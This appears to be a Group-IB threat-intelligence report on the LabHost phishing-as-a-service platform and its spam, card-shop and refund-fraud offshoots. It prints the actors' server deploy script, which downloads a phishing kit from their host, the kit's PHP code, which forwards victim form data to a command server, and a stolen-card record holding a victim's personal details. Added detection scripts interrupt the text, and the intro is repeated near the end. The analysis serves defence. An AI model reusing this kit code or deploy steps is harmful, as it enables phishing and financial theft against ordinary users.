In early 2024, Group-IB’s Threat Intelligence team observed a surge in phishing URLs targeting INTERAC, a Canadian payment service. Subsequently, a client operating in Canada reported an uptick in phishing attempts against their customers and shared a suspicious URL, lab-host[.]ru, prompting an investigation.
This inquiry unveiled a connection between the shared URL and INTERAC phishing pages, all originating from the LabHost Phishing-as-a-Service (PhaaS) platform.
In our latest blog post, we delve into the operations of LabHost and its subsidiary, LabCVV, exposing a sophisticated criminal network offering stolen credit card data for sale. While numerous PhaaS platforms exist, LabHost stands out due to its unique business model, which includes not only phishing services but also avenues for monetizing stolen credit cards and banking credentials through services like LabRefund.
We detail actionable insights and hunting techniques for Threat Intelligence and Anti-Fraud specialists to detect and mitigate such threats effectively. By shedding light on the fraudulent infrastructure behind LabHost and offering practical recommendations, this blog post aims to empower organizations in safeguarding their assets and clients against cyber threats.
Executive summary
The fraudulent ecosystem consists of the following main entities:
- LabHost – PhaaS platform
- LabCVV – credit card shop
- LabSend – SMS/MMS spam delivery system
- LabRefund – Telegram channel and private groups where the criminals teach their customers how to utilise stolen data
The first message related to LabHost was caught by Group-IB back in August 2021. We assume it is the date of foundation.
LabHost provides its users with a platform for orchestrating phishing attacks: it automates the deployment and configuration of phishing websites and offers modules for manually guiding victims through predefined attack scenarios. On top of that, the service lets criminals manage stolen logs and credit card information in a very convenient way. Overall, this approach significantly lowers the technical skill required of prospective users and, as a result, leads to a growing number of phishing attacks.
Criminals start by renting a VPS and auto-deploying a phishing website on it by providing root access through the portal. A few minutes later the server is ready to be used.
The fraudster then generates links to the phishing page and sends them to victims using the LabSend service. LabSend is a spam service which provides its users with an Android application and a management panel for sending SMS/MMS messages through connected Android devices.
Victims receive a phishing link, open it and, following predefined scenarios, are guided through phishing pages which ask them to enter sensitive data such as credit card number, CVV, first and last name, date of birth, etc. Here the LabRat module can be used by criminals to manually steer victims through attack scenarios in order to steal 2FA codes or any other information required to conduct the fraud.
After collecting logs with sensitive data and credit cards, criminals can use them to cash out money through drop accounts or sell them in the LabCVV shop. A third option is the LabRefund service, which is supported by the LabHost owners.
LabRefund is managed by LabHost owners and provides criminals with information on internet shops, where stolen credit cards can be used to order items and goods or even to make a refund on criminals’ accounts.
In other words, the LabHost ecosystem provides not only a tool to facilitate phishing attacks, but the whole infrastructure to monetize stolen data.
Investigation of DarkWeb forums and TG chats revealed at least 3 monikers highly likely connected to the criminal group: @MrSmartICQ, @Zimna514, @houdini13.
The source code of the LabSend APK was also uploaded to VirusTotal from Armenia via the web interface, which highly likely means that one of the developers is located in this country. VirusTotal also reveals a link to a GitHub account.
Phishing-as-a-service
Dashboard and features
After creating an account, LabHost requires the user to purchase a subscription plan targeting North America or all other regions. The “North America” membership subscription is available in monthly, quarterly, and yearly payment plans at US$250 per month, whereas the “World” subscription is only available in monthly payments of US$300.
The subscription offers access to a fully automated deployment process for phishing pages, along with IP filtering based on geolocation and device filtering based on user agent. Subscribers also gain access to LabRat, a feature akin to the O-panel and OV6 modules of the uAdmin kit, which provides real-time control of the attack scenario for stealing 2FA codes and other sensitive information. After login, a dashboard displays statistics on collected logs, stolen credit cards, the geographical distribution of victims, and a list of recent victim sessions associated with the phishing pages.
The service provides support via a ticket system, so any user can initiate a conversation with LabHost:
Creating a phishing site
The process of creating phishing websites is super simple and fully automated. It doesn’t require any technical knowledge from a criminal: just pay for a subscription and click a few buttons.
Once a criminal rents a VPS (running CentOS or Ubuntu), they need to allow root access and enter the root password during the deployment process on LabHost:
The user can then choose from a list of 28 financial institutions, 12 online retail and service providers, and other real-world companies in the North America region to create a phishing site.
The attacker can also filter visitors by location (using geo-IP) and/or by device (using the browser's user agent). The system also lets criminals choose where the victim is redirected after the theft: the real website of the impersonated organization, Bing, Yahoo, Google, Apple, etc. All options are listed in the screenshot above.
This final step is actually very important. When victims are redirected to the real website, the organisation can detect the phishing website quickly by analysing the referrers of visitors to its own site. This check is part of the Fraud Protection product provided by Group-IB and is the most efficient way to mitigate the threat.
When everything required has been specified and provided, the backend logs in to the VPS as root and executes the following shell script (the DHL page is used as an example):
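The referrer check described above, as an added example that is not part of the original post: it parses combined-format web server access logs of the impersonated organization and groups requests by referring host, dropping the organization's own domains and the search engines LabHost also offers as post-theft redirect targets, so that an unknown host sending many visitors straight to the home page stands out. Log lines, domains and the "interac-verify.example" phishing host are constructed; Referrer-Policy on the phishing page can suppress the header, so absence of a referrer is not evidence of absence.

```python
"""Hunt for phishing kits that redirect victims to the real site after the theft:
the phishing host shows up as the Referer of the victim's first request to us."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Hosts we expect as referrers (hypothetical own domains plus the redirect targets
# the kit offers besides the real site); these alone are not a signal.
OWN_HOSTS = {"www.example-bank.ca", "example-bank.ca"}
BENIGN_REFERRERS = {"www.google.com", "www.bing.com", "search.yahoo.com", "www.apple.com"}

# Constructed sample log (not real traffic). Two visitors arrive from the same
# unknown host right after a "thank you" page, the classic post-theft redirect.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2024:09:15:02 +0000] "GET / HTTP/1.1" 200 5120 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)"
203.0.113.11 - - [12/Mar/2024:09:15:59 +0000] "GET / HTTP/1.1" 200 5120 "https://interac-verify.example/thankyou" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)"
203.0.113.12 - - [12/Mar/2024:09:16:10 +0000] "GET /login HTTP/1.1" 200 2048 "https://www.example-bank.ca/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
203.0.113.13 - - [12/Mar/2024:09:17:44 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 13)"
203.0.113.14 - - [12/Mar/2024:09:18:03 +0000] "GET / HTTP/1.1" 200 5120 "https://interac-verify.example/thankyou" "Mozilla/5.0 (Linux; Android 13)"
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referer_host(referer):
    """Lower-cased hostname of a Referer value; '' for '-' or unparsable values."""
    if not referer or referer == "-":
        return ""
    return (urlsplit(referer).hostname or "").lower()


def unknown_referrers(log_text, own_hosts=OWN_HOSTS, benign=BENIGN_REFERRERS):
    """Group requests by referring host, dropping hosts we own or trust.

    Returns {host: {"hits": n, "ips": set, "paths": set, "first_seen": str}},
    noisiest unknown referrer first.
    """
    known = {h.lower() for h in own_hosts | benign}
    own_suffixes = tuple("." + h.lower() for h in own_hosts)
    seen = defaultdict(lambda: {"hits": 0, "ips": set(), "paths": set(), "first_seen": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        host = referer_host(rec["referer"])
        if not host or host in known or host.endswith(own_suffixes):
            continue
        entry = seen[host]
        entry["hits"] += 1
        entry["ips"].add(rec["ip"])
        entry["paths"].add(rec["path"])
        entry["first_seen"] = entry["first_seen"] or rec["time"]
    return dict(sorted(seen.items(), key=lambda kv: -kv[1]["hits"]))


if __name__ == "__main__":
    for host, info in unknown_referrers(SAMPLE_LOG).items():
        print(f"{host}: {info['hits']} hits from {len(info['ips'])} IPs, "
              f"first seen {info['first_seen']}, landing on {sorted(info['paths'])}")
```

Unknown referring hosts surfaced this way are candidates for a manual visit and a takedown request, not proof on their own.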
echo LabHost test
cat /etc/*release
apt install sudo -y
sudo sed -i "s/#precedence ::ffff:0:0\/96 100/precedence ::ffff:0:0\/96 100/" /etc/gai.conf
export DEBIAN_FRONTEND=noninteractive
apt-get update -y
apt-get install -y --force-yes software-properties-common
apt-add-repository ppa:ondrej/apache2 -y
apt-add-repository ppa:ondrej/php -y
apt-get update -y
add-apt-repository universe -y
apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes build-essential curl pkg-config zip unzip apache2
apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes php libapache2-mod-php php-cli php-dev php-pgsql php-sqlite3 php-gd php-curl php-memcached php-imap php-mysql php-mbstring php-xml php-zip php-bcmath php-soap php-intl php-readline php-msgpack php-igbinary php-gmp
sudo sed -i '//,/<\/Directory>/ s#AllowOverride None#AllowOverride All#' /etc/apache2/apache2.conf
a2enmod rewrite
systemctl restart apache2
apt-get update -y
apt install unzip -y
rm -rf /var/www/html/.htaccess
rm -rf /var/www/html/*
sudo wget -P /var/www/html --no-check-certificate "https://instapi-1xoa93z90o348fz.co/file-xm3728d/1709912030/global-dhl.zip"
sudo unzip /var/www/html/global-dhl.zip -d /var/www/html
sudo rm -f /var/www/html/global-dhl.zip
sudo chmod -R 755 /var/www/html
sudo sed -i 's/{{apikey}}//' /var/www/html/app/init.php
sudo sed -i 's#{{url}}#https://api2-4hdfix74ks.co#' /var/www/html/app/init.php
sudo systemctl restart apache2
The script for other targets is very similar to the one above; the only thing that changes is the URL of the phishing kit archive. However, all of them referred to instapi-1xoa93z90o348fz.co.
Another interesting finding in this script is the API address, where the subscription is checked: api2-4hdfix74ks.co.
LabRat aka real-time victim control module
Once a phishing server is set up, a link is generated and can be sent to a victim. When the victim visits the phishing site and passes all filters based on the browser's UA and IP geolocation, a phishing page is shown.
Whenever a victim visits the phishing website, the server performs a request to check whether the hardcoded API key is valid and the subscription is active. If these checks are successful a criminal can observe an active session in the panel:
To work with active sessions, the criminals use the LABRAT module, which is actually not a RAT at all but a dynamic module for controlling fraud scenarios and requesting additional information from the victim, such as a 2FA code or PII (date of birth, first and last names, driver's license number, etc.). It is very similar to the O-panel module implemented in the notorious uAdmin phishing kit.
For example, it allows the operator to choose from the following scenarios:
While the operator is choosing a scenario, the victim sees a loading stub:
Source codes analysis
Every targeted organization has its own template, but the general structure is the same. For this example we analyze an archive used as a template targeting its victims:
Folder structure
The entry point for this web app is ./app/init.php:
<?php
session_start();
ob_start();
define('HOME_FOLDER', $_SERVER['DOCUMENT_ROOT']);
date_default_timezone_set('Europe/London');
$globalurl = '{{url}}';
$apikey = '{{apikey}}';
$route = $_SERVER['REQUEST_URI'];
$url = $globalurl . $route;
$_SERVER['HOST_IP'] = gethostbyname($_SERVER['SERVER_NAME']);
$post = [
    'post' => isset($_POST) ? $_POST : [],
    'session' => isset($_SESSION) ? $_SESSION : [],
    'server' => isset($_SERVER) ? $_SERVER : [],
    'apikey' => $apikey
];
$splitter = explode('.', $route);
$extension = $splitter[count($splitter) - 1];
$headers = [
    'css' => 'text/css',
    'js' => 'text/javascript',
    'gif' => 'image/gif',
    'html' => 'text/html',
    'htm' => 'text/html',
    'ico' => 'image/vnd.microsoft.icon',
    'jpeg' => 'image/jpeg',
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'json' => 'application/json',
    'php' => 'application/x-httpd-php',
    'woff' => 'font/woff',
    'woff2' => 'font/woff2',
    'xml' => 'application/xml',
    'svg' => 'image/svg+xml'
];
$header = isset($headers[$extension]) ? $headers[$extension] : '';
if (empty($header)) {
    $download = rtrim(downloadString($url, $post), 0);
    $response = json_decode($download, true);
    if (isset($response['session']) && is_array($response['session'])) {
        foreach ($response['session'] as $sname => $sval) {
            $_SESSION[$sname] = $sval;
        }
    }
    //die($download);
    switch ($response['type']) {
        case 0:
            $udata = json_decode(json_encode($response['data']));
            break;
        case 1:
            $redirect = !empty($response['redirect']) ? 'location: ' . $response['redirect'] : 'refresh:0';
            header($redirect);
            die();
            break;
        case 2:
            http_response_code(404);
            require_once HOME_FOLDER . '/pages/misc/unavailable.php';
            die();
            break;
        case 3:
            http_response_code(403);
            die();
            break;
        case 4:
            http_response_code(404);
            die();
            break;
        case 5:
            http_response_code(404);
            require_once HOME_FOLDER . '/pages/misc/suspended.php';
            die();
            break;
    }
    if (empty($download)) {
        http_response_code(404);
        //require_once HOME_FOLDER . '/pages/misc/unavailable.php';
        die();
    }
} else {
    header('Content-type: ' . $header);
    echo downloadString($url);
}

function downloadString($url, $data = null) {
    $ch = curl_init($url);
    if ($data) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    }
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1');
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $result = curl_exec($ch);
    $response = $result !== false ? $result : '';
    curl_close($ch);
    return $response;
}

function pdump($var) {
    echo '<pre>';
    var_dump($var);
    echo '</pre>';
    die;
}

function escape($string, $default = '') {
    if (is_array($string)) $string = $default;
    return htmlentities(html_entity_decode($string), ENT_QUOTES, 'UTF-8');
}

function ab_randomstr($length = 8) {
    $randomString = '';
    $characters = implode("", array_merge(range('a', 'z'), range('A', 'Z')));
    for ($i = 0; $i < $length; $i++) $randomString .= $characters[mt_rand(0, strlen($characters) - 1)];
    return $randomString;
}

function ab_enc($output) {
    $randomFunc = ab_randomstr(mt_rand(6, 12));
    $randomOut = ab_randomstr(mt_rand(6, 12));
    $randomNum = ab_randomstr(mt_rand(6, 12));
    $randomVal = mt_rand(1337, 99999999);
    $return = '<script>' . PHP_EOL;
    $return .= 'var ' . $randomOut . ' = "";' . PHP_EOL;
    $return .= 'var ' . $randomNum . ' = [';
    foreach(str_split($output) as $x) {
        $return .= (ord($x) + $randomVal) . ', ';
    }
    $return = rtrim($return, ', ');
    $return .= '];' . PHP_EOL;
    $return .= $randomNum . '.forEach(function ' . $randomFunc . '(value) { ' . $randomOut . ' += String.fromCharCode(parseInt(value) - ' . $randomVal . '); } );' . PHP_EOL;
    $return .= 'document.write(' . $randomOut . ');';
    $return .= '</script>';
    return $return;
}

function output($encrypt = false) {
    global $response;
    $device = $response['server']['devices'] ?? '';
    $output = ob_get_contents();
    ob_clean();
    if (strpos($_SERVER["SCRIPT_FILENAME"], 'api') === false) {
        if ($device == '1') {
            $output .= "<script>setTimeout(function() { if (screen.width >= 600) { window.location = '/notfound'; } }, 100);</script>";
        } else if ($device == '2') {
            $output .= "<script>setTimeout(function() { if (screen.width < 600) { window.location = '/notfound'; } }, 100);</script>";
        }
    }
    $die = $encrypt ? ab_enc($output) : $output;
    die($die);
}
This code shows that every time a victim visits the phishing website, the server sends the API key to api2-4hdfix74ks.co (mentioned above in the "Creating a phishing site" section), where the subscription status is checked.
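The kit's ab_enc() function above hides the served HTML from simple crawlers by emitting a script of character codes shifted by one random offset, which the browser shifts back and document.write()s. As an added analysis helper that is not part of the original post or the kit, the following Python recognises that exact script layout in a captured page and recovers the HTML offline; build_fixture() only constructs a test page in the same layout (names and offset are made up).

```python
"""Recover the HTML hidden by LabHost's ab_enc()-style output obfuscation."""
import re

# Matches the literal layout ab_enc() produces: two random identifiers, a list of
# shifted byte values, a forEach that subtracts the offset, then document.write().
AB_ENC_RE = re.compile(
    r'<script>\s*var (?P<out>\w+) = "";\s*'
    r'var (?P<arr>\w+) = \[(?P<nums>[\d, ]*)\];\s*'
    r'(?P=arr)\.forEach\(function \w+\(value\) \{ (?P=out) \+= '
    r'String\.fromCharCode\(parseInt\(value\) - (?P<key>\d+)\); \} \);\s*'
    r'document\.write\((?P=out)\);\s*</script>',
    re.DOTALL,
)


def decode_ab_enc(page):
    """Return (html, offset) for the first ab_enc-style script in `page`, else None.

    PHP's str_split() walks bytes, not characters, so every list entry is one byte
    plus the offset; rebuilding bytes and decoding as UTF-8 restores non-ASCII text.
    """
    m = AB_ENC_RE.search(page)
    if not m:
        return None
    key = int(m.group("key"))
    values = [int(n) for n in m.group("nums").split(",") if n.strip()]
    if any(not 0 <= v - key <= 255 for v in values):
        return None  # matched the shape but the numbers are not shifted bytes
    raw = bytes(v - key for v in values)
    return raw.decode("utf-8", errors="replace"), key


def build_fixture(html, key=4242, out="qWErtZ", arr="zxCVbn", func="asdFGh"):
    """Constructed test page reproducing the layout of ab_enc() output (hypothetical
    identifiers and offset), used only to exercise the decoder offline."""
    codes = ", ".join(str(b + key) for b in html.encode("utf-8"))
    return (
        "<script>\n"
        f'var {out} = "";\n'
        f"var {arr} = [{codes}];\n"
        f"{arr}.forEach(function {func}(value) {{ {out} += "
        f"String.fromCharCode(parseInt(value) - {key}); }} );\n"
        f"document.write({out});</script>"
    )


if __name__ == "__main__":
    sample = build_fixture("<html><body>Vérifiez votre compte</body></html>")
    print(decode_ab_enc(sample))
```

Hunting note: a landing page whose body is a single script of that shape, with no visible HTML and a `document.write`, is itself a strong kit fingerprint even before decoding.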
DarkWeb/Telegram analysis
An investigation of darkweb forums and Telegram channels revealed messages about “Labhost” from August 2021.
The service was most actively promoted by three users in Canadian Telegram chats: @MrSmartICQ, @Zimna514 and @houdini13.
The first mentions of “Labhost” from August 24, 2021, were found in the Montreal Telegram chat @mtltrap (🇨🇦𝗠𝗧𝗟 𝗧𝗥𝗔𝗣𝗦𝗧𝗔𝗥𝗦🇨🇦). Currently, the chat has been deleted, but the messages have been archived by the Group-IB Threat Intelligence system.
Messages were sent from accounts https://t.me/MrSmartICQ (id 724887901) and https://t.me/houdini13 (id 882956983). Both accounts are still active, have not changed their usernames, and belong to the same individuals as in 2021.
On September 6, 2021, the first message was sent with a link to the Telegram channel https://t.me/labhost.
The channel was created on August 17, 2021, and the first messages appeared on August 29, 2021. The Telegram channel remains active and is still used by “Labhost”.
On September 7, 2021, @MrSmartICQ announced the first domain “LabHost” – https://labhost[.]cc. A similar message was also published on the Telegram channel @labhost.
The third account promoting “LabHost” was https://t.me/Zimna514 (id 2012343631). On October 3, 2021, on the Telegram channel @mtltrap, he posted a message with the new domain https://labhost[.]co. Unlike the other two accounts, @Zimna514 is already deleted.
Houdini13 also owns the service “The Lab Refunds” with the Telegram channels https://t.me/TheLabRefunds and https://t.me/labrefundvouch. This service also operates only in Canada. We assume that this is how goods bought with a stolen card are refunded to the threat actor’s own card or to a drop card.
Using stolen accounts or credit card data obtained through phishing, fraudsters purchase goods on legitimate online stores such as Amazon, Zara, Puma, Asos and Monos. The service “The Lab Refunds” then assists them with the refunds.
In August 2023, @houdini13 also advertised a service for spam mailings “Lab Send” (https://t.me/LabSend, https://labsend[.]co).
In addition to the clear focus of the “LabHost” service on Canada and advertising in the Montreal chat, there are also indications that individuals associated with “LabHost” are located in Canada.
This mainly concerns the user @houdini13. Since September 2021, he has been selling “Canada profiles”.
For this purpose, he created the Telegram bot @HoudiniProfiles_Bot, later changed to https://t.me/ProfileShop_Bot, which still works.
We found 115 messages advertising @HoudiniProfiles_Bot in Telegram chat @mtltrap and only one of them was not sent by @houdini13. It was a message with completely matching text, but it was sent by @Zimna514.
In August and September 2021, “LabHost” was advertised by the accounts @MrSmartICQ and @houdini13, but since October 2021, it has been advertised by @MrSmartICQ and @Zimna514. We assume that the accounts @houdini13 and @Zimna514 belonged to the same person.
The most interesting mention of Canada dates from 2021: in the since-deleted Telegram chat @NoirsRefunds, @houdini13 was looking for a Rolex, and in September he was already trying to refund it from Canada.
As for the account @Zimna514, although it has now been deleted, it is a highly distinctive username. A search for “Zimna514” revealed that only one person uses this nickname, coincidentally a Canadian citizen. However, at the moment we do not have enough data to assert his involvement with “LabHost”.
There is less public information about the account @MrSmartICQ, but it is also associated with Canada.
Even a year before the creation of “LabHost”, in September 2020, @MrSmartICQ was looking for a database of profiles from Canada.
Interestingly, in 2022, he was looking for a designer to improve his website and apparently found one.
LabSend spam management service
The LabSend spam service was initially released in 2022. According to its Telegram channel, it is a device management platform that facilitates spam campaigns via SMS/MMS messages.
Key Features
- Unlimited Devices
- SMS and MMS Sending
- Syntax Messaging (message randomizer)
- Auto Responder
- Custom Delays
- Message Templates
- Multiple Languages
- Responsive Support
- Constant Updates
Moreover, the ad says that combining LabHost with LabSend maximizes results.
All marketing materials (videos, GUI) are produced very professionally. The subscription is pretty cheap for this kind of service:
Users of the LabSend service download and install an APK on their Android devices; they can then run spam campaigns from the web platform, sending phishing links to victims.
Group-IB found this APK uploaded to VirusTotal on 2023-11-20 with SHA1 hash cda695baad4be4f6067195395997360337a43d6f. Based on our reverse-engineering analysis, it uses labsend[.]co and files.labsend[.]co as C2 addresses.
LabCVV Card Shop
On 3 January 2024 the official Telegram group of LabHost started advertising the LabCVV credit card shop.
The credit card shop has a UI very similar to the LabHost service. This similarity, and the fact that the CC shop is promoted by LabHost, lead to the assumption that both services belong to the same criminal group, or at least were developed by the same web designer.
Example of purchased data:
|============ Details ===========|
| Full Name:
| Address:
| City: Laval
| Postal Code: H7T 0E2
| Phone:
| DOB: 10/09/1953
|
| Date: 09:15:01pm
| Browser: Mobile Safari
| OS: iOS
| Location: Montreal, Canada
| IP Geo: http://www.geoiptool.com/?IP=142.169.16.238
| User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1
|
|============ Card Info ===========|
| Card:
| Expiry: 03/23
| Cvv:
|
| Bank:
| Scheme: VISA
| Type: DEBIT
| Brand: TRADITIONAL
| Bin:
| Country: CA
| Prepaid: NON-PREPAID
|
| Time: 09:15:59pm
|
|============ Card Info ===========|
| Card:
| Expiry: 03/23
| Cvv: 413
|
| Bank:
| Scheme: VISA
| Type: DEBIT
| Brand: TRADITIONAL
| Bin:
| Country: CA
| Prepaid: NON-PREPAID |
Recommendations
For common users
- Always be cautious and fully aware of anything sent to you, even if you think it may be legitimate.
- Do not click on any links that you are not 100% confident are real
- Double check the address of a website is the official one before you submit any information
- If the link comes from someone you know, confirm with that person using another way of communication
- Contact the organization that sent you a link to confirm they have really sent you that message
- If in doubt, use services like URLScan or VirusTotal to quickly scan the URL you have been sent, and look for red flags
- If you think you may be a victim of a phishing attack, immediately contact your bank, the organization being impersonated by the fraudsters, and local law enforcement. They can issue an alert which may ultimately raise awareness and reduce the victim count.
- Keep in mind that official organizations usually do not use URL shorteners, so links leading to bit.ly, s.id, tny.sh and others are very suspicious and you should double check the final destination
- Report any identified phishing email or SMS to fraudehelpdesk.nl, scamadviser.com and the impersonated organizations. These reports help cybersecurity professionals investigate and take action against fraudulent websites, in addition to protecting other potential victims.
For targeted businesses
There are several ways to fight this type of threat. Let's enumerate them in order of efficiency:
- Continuous monitoring and detection of phishing websites and their take-down process
- Analysing the infrastructure and taking it down
- A state-of-the-art anti-fraud solution that can detect and block unauthorized logins and transactions
- An investigation focused on finding the identities of the criminals behind the PhaaS.
While the first two approaches can temporarily mitigate the threat, they require continuous investments and don’t guarantee 100% coverage.
At Group-IB we advise our corporate customers to investigate specific phenomena and identify criminals behind a scheme. For financial organizations we recommend installing Group-IB’s Fraud Protection Service.
Our Fraud Protection team recommends:
- Continuous surveillance of new threats and beginning the phishing site takedown process using Threat Intelligence and Digital risk or Brand protection providers. These services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk.
- Implement active call detection using session monitoring systems: abnormal call duration, remote access detection, parallel access to a user account from different devices, and access from well-known fraudulent devices.
According to the Group-IB Fraud Matrix, the following detection and mitigation steps for this scheme are required:
Resource Development
Internal mule accounts
Detections:
Data Source | Data Component | Description
Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions
Trust abuse
Mitigations:
Data Source | Data Component | Description
Threat intelligence providers | Dark web, instant messages, monitoring | Threat intelligence services help an organization generate its threat intelligence information and track trends to inform defensive priorities to mitigate risk.
Digital risk or brand protection providers | Brand abuse | Digital or brand protection services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk.
Account access
Detections:
Data Source | Data Component | Description
Sessional Monitoring | Non-monetary transaction | Parallel access to a user account from different devices
Sessional Monitoring | Device fingerprinting | Access from well-known fraudulent devices
Perform fraud
Detections:
Data Source | Data Component | Description
Transaction Monitoring | Real-time Transaction Monitoring | Flagging unusual patterns such as frequent transfers to newly created or unrelated accounts, high-volume transactions inconsistent with typical customer behaviour, and transfers to accounts with no apparent legitimate connection to the sender.
Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions
Phishy Business: Unraveling LabHost’s scam ecosystem
Group-IB takes part in a global operation to cripple Canadian Phishing-as-a-Service provider LabHost
April 18, 2024 · 24 min to read · Threat Intelligence
LabHost
Phishing-as-a-Service
Threat Intelligence
In early 2024, Group-IB’s Threat Intelligence team observed a surge in phishing URLs targeting INTERAC, a Canadian payment service. Subsequently, a client operating in Canada reported an uptick in phishing attempts against their customers and shared a suspicious URL, lab-host[.]ru, prompting an investigation.
This inquiry unveiled a connection between the shared URL and INTERAC phishing pages, all originating from the LabHost Phishing-as-a-Service (PhaaS) platform.
In our latest blog post, we delve into the operations of LabHost and its subsidiary, LabCVV, exposing a sophisticated criminal network offering stolen credit card data for sale. While numerous PhaaS platforms exist, LabHost stands out due to its unique business model, which includes not only phishing services but also avenues for monetizing stolen credit cards and banking credentials through services like LabRefund.
We detail actionable insights and hunting techniques for Threat Intelligence and Anti-Fraud specialists to detect and mitigate such threats effectively. By shedding light on the fraudulent infrastructure behind LabHost and offering practical recommendations, this blog post aims to empower organizations in safeguarding their assets and clients against cyber threats.
Executive summary
The fraudulent ecosystem consists of three main entities:
- LabHost – PhaaS platform
- LabCVV – credit card shop
- LabSend – SMS/MMS spam delivery system
- LabRefund – TG channel and private groups where criminals teach their customers how to utilise stolen data
The first message related to LabHost was caught by Group-IB back in August 2021. We assume it is the date of foundation.
LabHost provides a platform to its users for orchestrating phishing attacks by automating processes of deployment and configuring phishing websites as well as modules for manual guiding of victims through some predefined attack scenarios. On top of that the service allows criminals to manage stolen logs and credit card information in a very convenient and comfortable way. Overall this approach significantly decreases requirements to tech skill of possible users and leads to an increasing amount of phishing attacks as a result.
Criminals start their path by renting a VPS server and auto-deploying a phishing website by providing access on the portal. Then in a few minutes the server is ready to be used.
The fraudster then generates links to a phishing page and sends it to victims using the LabSend service. LabSend is a spam service which provides its users an Android application and management panel for sending SMS/MMS messages using connected Android devices.
Victims receive a phishing link, open it and according to predefined scenarios guided through phishing pages which ask them to fill sensitive data like: credit card number, CVV, first and last name, date of birth, etc. The LabRat module here can be used by criminals to manually guide victims through attack scenarios in order to steal 2FA codes or any other information required to conduct a fraud.
After collecting logs with sensitive data and credit cards, criminals can use them to cash out money using drop accounts or sell them using the LabCVV shop. And there is another option with the service called LabRefund and supported by LabHost owners.
LabRefund is managed by LabHost owners and provides criminals with information on internet shops, where stolen credit cards can be used to order items and goods or even to make a refund on criminals’ accounts.
In other words, the LabHost ecosystem provides not only a tool to facilitate phishing attacks, but the whole infrastructure to monetize stolen data.
Investigation of DarkWeb forums and TG chats revealed at least 3 monikers highly likely connected to the criminal group: @MrSmartICQ, @Zimna514, @houdini13.
Also source codes of LabSend APK were uploaded to VirusTotal from Armenia via web interface. Which means that highly likely one of the developers is located in this country. VirusTotal reveals a link to github account.
Phishing-as-a-service
Dashboard and features
After creating an account, LabHost requires the user to purchase a subscription plan targeting North America or all other regions. The “North America” membership subscription is available in monthly, quarterly, and yearly payment plans at US$250 per month, whereas the “World” subscription is only available in monthly payments of US$300.
The subscription offers access to a fully automated deployment process for phishing pages, along with IP and device filtering based on geo-location and user agent, respectively; additionally, subscribers gain access to LabRat, a feature akin to O-panel and OV6 modules in uAdmin kit, facilitating real-time scenario control for stealing 2FA and other sensitive information, with an accompanying dashboard upon login displaying statistics on collected logs, stolen credit cards, geographical distribution of victims, and a list of recent victim sessions associated with phishing pages.
The service provides support via a ticket system, so any user can initiate a conversation with LabHost:
Creating a phishing site
The process of creating phishing websites is super simple and fully automated. It doesn’t require any technical knowledge from a criminal: just pay for a subscription and click a few buttons.
Once a criminal rent a VPS (running a CentOs or Ubuntu), he needs to allow root access and fill in root password during deployment process on LabHost:
The user can then choose from a list of 28 financial institutions, 12 online retail and service providers, and other real-world companies in the North America region to create a phishing site.
The attacker can also filter visitors by their location (using geo IP) and/or their device (using browser’s user-agent). The system also allows criminals to determine where their victim will be redirected after theft: the real website of the lured organization, Bing, Yahoo, Google, Apple, etc. All options are listed above on the screenshot.
This final phase is actually very important. In case of redirection to a real website, organisations can detect phishing websites pretty fast by analysing referrers of the visitors to their website. It is one of a part of Fraud Protection product provided by Group-IB which is the most efficient way to mitigate the threat.
When everything required is specified and provided the backend logins via root to the VPS and executes the following batch script (DHL page is used as an example):
